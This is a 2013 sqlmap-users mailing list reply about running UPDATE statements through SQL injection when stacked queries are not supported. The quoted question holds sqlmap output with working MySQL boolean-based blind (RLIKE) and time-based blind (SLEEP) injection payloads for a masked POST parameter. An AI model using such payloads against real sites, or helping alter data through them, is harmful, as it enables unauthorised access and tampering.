Re: [sqlmap-users] stacked queries and different injection points
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] stacked queries and different injection points
|
From: Miroslav S. <mir...@gm...> - 2013-02-18 08:17:45
|
Hi. It's very simple. If stacking of queries is not supported (e.g. id=1;UPDATE..) then you can't use non-query SQL statements. Pretty simple. Bye Dana 18.2.2013. 01:04 "Bruno Garcia" <gar...@gm...> je napisao/la: > Hello, > > I have this injection: > > Place: POST > Parameter: xxxxx > Type: boolean-based blind > Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY > clause (RLIKE) > Payload: xxx=xxxx&xxxx=test' RLIKE IF(8894=8894,0x4d7953514c,0x28) AND > 'qGgA'='qGgA > Vector: RLIKE IF([INFERENCE],[ORIGVALUE],0x28) > > Type: AND/OR time-based blind > Title: MySQL > 5.0.11 OR time-based blind > Payload: tipo=xxxxx&xxxxx=-1188' OR 7506=SLEEP(5) AND 'lBGC'='lBGC > Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) > > > and I get this when using UPDATE > > [WARNING] execution of custom SQL queries is only available when stacked > queries are supported. > > Is there any workaround for this? > Also, it shows that it detected two injections, and it's using the first > one for doing the queries, is there anyway I could test the queries with > the second injection? > > Thanks > > > > > > > ------------------------------------------------------------------------------ > The Go Parallel Website, sponsored by Intel - in partnership with Geeknet, > is your hub for all things parallel software development, from weekly > thought > leadership blogs to news, videos, case studies, tutorials, tech docs, > whitepapers, evaluation guides, and opinion stories. Check out the most > recent posts - join the conversation now. > http://goparallel.sourceforge.net/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
